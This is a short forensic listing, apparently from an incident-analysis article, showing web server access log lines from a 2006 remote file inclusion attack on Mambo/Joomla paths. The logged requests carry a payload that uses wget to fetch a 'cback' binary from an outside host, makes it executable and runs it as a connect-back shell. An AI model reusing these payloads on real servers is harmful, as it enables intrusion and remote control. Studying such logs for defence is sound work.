Listing 2. Attack Traces in Web Server Access Log

# grep 10.9.233.25 /root/exploit.log
/var/log/httpd/access_log:10.9.233.25 - -
[04/May/2006:07:52:21 -0400]
"GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;wget%20172.16.31.57/cback;chmod%20744%20cback;./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1" 200 594 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - -
[04/May/2006:07:52:24 -0400]
"GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;wget%20172.16.31.57/cback;chmod%20744%20cback;./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - -
[04/May/2006:07:52:25 -0400]
"GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;wget%20172.16.31.57/cback;chmod%20744%20cback;./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - -
[04/May/2006:07:52:27 -0400]
"POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"